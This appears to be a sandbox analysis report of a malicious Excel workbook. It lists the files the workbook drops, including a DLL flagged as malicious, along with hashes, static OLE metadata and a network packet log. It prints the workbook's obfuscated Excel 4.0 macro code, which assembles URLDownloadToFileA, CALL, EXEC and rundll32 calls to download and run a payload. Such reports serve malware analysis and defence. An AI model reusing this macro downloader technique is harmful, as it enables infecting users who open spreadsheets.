Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\ECFE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	63675
Entropy (8bit):	7.681882109211247
Encrypted:	false
SSDEEP:	1536:AVAWEruqrMMz9Sw3xNhVsSAc2frW2Z1lf59dK:AqW2uqLTnjsSAc2frW2Xl1K
MD5:	2B8EAA4E128510D81711ED5DC2F0D625
SHA1:	F6B7EE2B7D5FF58D16DFB03B80E51E5C4C007BA0
SHA-256:	7D3FC51E287FC918129A9CA55EEE6A65BE0B7C57FF2A08AB80F65B48D54A02BE
SHA-512:	5902067B1E011E99AE301B8D6F9F09EA87AC7B76EE9822CBB6A6D2366B299075BACBF4CFBE10FEE7B0210FC244C2926B2DF3B7986EB42E2BA9E7F68F18C50FD6
Malicious:	false
Reputation:	low
Preview:	.UKO.0..#.."_Q..a.Z5..G......4..<....c7.....y9.c..'..5.3D........J..e..o..$...;h...]O.....X..a..../.Q.`.6>.....V$....B.E..j4...w.\.S.`.....'....=^9..c...{Y.e.f\|~."..m D.FK..4......fZ......C....H.4!j... %..whF0x..CC.b.{......W>..........^.t',......8.z?o...h,..`.R.c......Z..:.T..........n.J......`..g.6..?..X>#wuD.K........4...4.G.sJ/W...{.A=$...x.}....%[....s.....H..> ......:b2..D.1iX..m[x.H..t..A.y.+P[.y.kL........PK..........!........v.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tar743.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 03:13:50 2021, atime=Tue Feb 23 03:13:50 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.487203725510534
Encrypted:	false
SSDEEP:	12:85QAcLgXg/XAlCPCHaXtB8XzB/4kaX+Wnicvb/bDtZ3YilMMEpxRljKTTdJP9TdU:85k/XTd6j8YevDv3qKrNru/
MD5:	247E763D13A8DC8BABA84F5BD4D34ABF
SHA1:	DF528AD951543CEF8FD1F0F63BEA6A975AB36B35
SHA-256:	D306ED53C8D264B6FBE3FD9089EECC7036EEBC1B7BD4D228C7FDA221FD1562B0
SHA-512:	B9E81ECF07E2D280E214463A5D5024A59C148BE669A11531083B7F973CC9108F1952D663ED1AD367CC498BF332FF267163CA6CF7CC67E690D69489827345211C
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G...`.J.....`.J..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....WR.!..Desktop.d......QK.XWR.!..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......783875..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1915351743.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Tue Feb 23 03:13:50 2021, atime=Tue Feb 23 03:13:50 2021, length=90112, window=hide
Category:	dropped
Size (bytes):	2118
Entropy (8bit):	4.519606561599791
Encrypted:	false
SSDEEP:	48:8B/XT0jFB4QUu1QUhKQh2B/XT0jFB4QUu1QUhKQ/:8B/XojFBHGeKQh2B/XojFBHGeKQ/
MD5:	C696D8ABD820A2780E3148DA90CCE6F4
SHA1:	6DED380846F8366786487B6FA18FE66B2ACABA62
SHA-256:	9901EEE7B608DC38EAB3A5293C973D7863A898B903CAE511EAF2D1826B965413
SHA-512:	65FAF038B82E7B80A8B4E8C1C20C5FC42E0BF57477F692FCB48591FA3F8902C3E6C7BFA16DDFDD74293DAC7EC1DB560F13DBBEB15C5D79B187E956A616C666B6
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...h@..{...`.J.......J.....`...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..b..WR.! .DOCUME~1.XLS..\.......Q.y.Q.y...8.....................d.o.c.u.m.e.n.t.-.1.9.1.5.3.5.1.7.4.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop\document-1915351743.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.9.1.5.3.5.1.7.4.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......783875..........D_....3N.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.798475167598085
Encrypted:	false
SSDEEP:	3:oyBVomMY9LR4ZELR4mMY9LR4v:dj6Y9LYELMY9LU
MD5:	BF2AD65EAFD56497819A85193CD824DB
SHA1:	F44FAA4A4625E649CA96572158E6E2E97C9E4A91
SHA-256:	C59E1057CE175F244699F99056434E04E81A6311497A0AC57144FA8BE3EABF19
SHA-512:	6C3180045FFE864FE6B9511091930C3926C49AADFA3012BDAC2236DDA4F3C53B782E9791CFF1177D7374969CC8F16DAD468D307671EF0CF28040F9F2AB034308
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..document-1915351743.LNK=0..document-1915351743.LNK=0..[xls]..document-1915351743.LNK=0..

C:\Users\user\Desktop\ADFE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	123569
Entropy (8bit):	4.29727029477041
Encrypted:	false
SSDEEP:	3072:NWcKoSsxzNDZLDZjlbR868O8KL5L+LxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAFV5:ccKoSsxzNDZLDZjlbR868O8KL5L+LxE0
MD5:	AFF3B20C261A6FC4AFCE9E36B657DFC4
SHA1:	AAB452878F3F62B821A3AE907712C8CC730CE09F
SHA-256:	10F5153EB33502CBB8EAD05A66B308E25D5C2285CB37D8DF2D39115F1AD3B350
SHA-512:	720AE21E1CC33AD1A80214E62CA4CD6513B3411FBFAB982E245DFC9501602B102CF6A095B0020820CCD131D0DBD2A58BDF0440CF5AE80C29262D90DF3DB0CF73
Malicious:	false
Preview:	........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

C:\Users\user\idefje.ekfd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3137688
Entropy (8bit):	7.755290707394975
Encrypted:	false
SSDEEP:	49152:dqGB2KwBl+dyMzac4d12JVb4ZwDI0A3dQIOOtxE5/8ojWVVidT7gU9Y7xV:FB1wBlYykZ4L2JVkWQ3REJjWS7M7xV
MD5:	1D101557DC7B95085BA874AC4BDB38DC
SHA1:	D92E541C707CB8825860BA8F3BF801B06FB5B0C2
SHA-256:	21249CE24600B1FEAC26A2A9883F3C6DE299681A924BE281630BC3869F0F4044
SHA-512:	31DFFD6AB386D1E6DF37D9AA0333C2D16B3E154D2557BF1D8BB39AE313285AE4FC463A4ED92B8A86F39FF4A624D35DFC83C1B7567E634A96E29B47347E5D6E2F
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 41%
Joe Sandbox View:	Filename: document-750895311.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......`.........." ................7.........................................G.....S.0...`.............................................V................... .F......./.......F......................................................P...............................text...C........................... ..`bss..........0...........................rdata.......@......................@..@.data........P......................@....pdata.......`......................@..@.vmp0...P....p......................`..`.vmp1...../.. ..../.................`..h.reloc........F......./.............@..B................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 09:52:57 2021, Security: 0
Entropy (8bit):	3.4280395676310693
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	document-1915351743.xls
File size:	90624
MD5:	976d437fbf1c1598413411d366092cb6
SHA1:	ab1c382ec0a25bd9881eee9a3401c9e1b78ee4e5
SHA256:	21944a6a3c05598d1cdc6893c982e22d81344ff8bc8225811691512976aa6bcc
SHA512:	f77580c1307c71dcbdfb2ee9d0d5bac506929f66b5c98f0e42f55f066b5da8aeaafb3db74eda4fb0cde1dd2d220dbef5a3ffb354b0a31314216f94f654a88eec
SSDEEP:	1536:RLcKoSsxz1PDZLDZjlbR868O8KlVH327uDphYHceXVhca+fMHLtyeGxcl8O9pTIR:RLcKoSsxzNDZLDZjlbR868O8KlVH327o
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "document-1915351743.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2021-02-18 09:52:57
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.318330155209
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 1 . . . . . D o c 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 9f 00 00 00 02 00 00 00 e3 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.257530318219
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . \| . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 80004

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	80004
Entropy:	3.63819297829
Base64 Encoded:	True
Data ASCII:	. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=before.2.4.0.sheet!AK28(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(AP41&""2 "",AD15)","=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(AQ41,AE15)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AE14(),=Doc2!AC12(),,,"=FORMULA(AO36&AO37&AO38&AO39&AO40&AO41,AO25)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AG24(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AO25,Doc2!AC13&Doc2!AC12&AG25&""A"",""JJC""&""CBB"",0,before.2.4.0.sheet!A100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&before.2.4.0.sheet!AQ30,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AO5(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REPLACE(before.2.4.0.sheet!AQ25,6,1,before.2.4.0.sheet!AQ26)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REPLACE(AP34,6,1,before.2.4.0.sheet!AL12)",,,,,,,,URLMon,,egist,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AK22(),,,,,,,,,,erServer,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(before.2.4.0.sheet!AD15&before.2.4.0.sheet!AQ30&before.2.4.0.sheet!AE15&AG24)",,,,r,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,u,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,l,..\idefje.ekfd,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,File,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Dow,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,URL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,rundll3,",DllR",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,"=REPLACE(Doc1!AP35,7,7,""nloadTo"")","=REPLACE(Doc1!AP39,7,7,"""")","=REPLACE(#REF!AB7&#REF!AB8&#REF!AB9&#REF!AB10&#REF!AB11,7,7,""l3"")",=Doc1!AH16(),

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 20:13:33.551198959 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:33.782202959 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:33.782305002 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:33.792623997 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:34.021686077 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:34.028012991 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:34.028074026 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:34.028115034 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:34.028166056 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:34.028196096 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:34.028307915 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:34.028352976 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:34.072249889 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:34.303448915 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:34.303565025 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:35.351800919 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:35.617629051 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137553930 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137598991 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137617111 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137635946 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137659073 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137676001 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137691975 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137713909 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137737989 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137763023 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.137840986 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.137882948 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.138063908 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.364566088 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364594936 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364614964 CET	443	49165	197.242.147.47	192.168.2.22
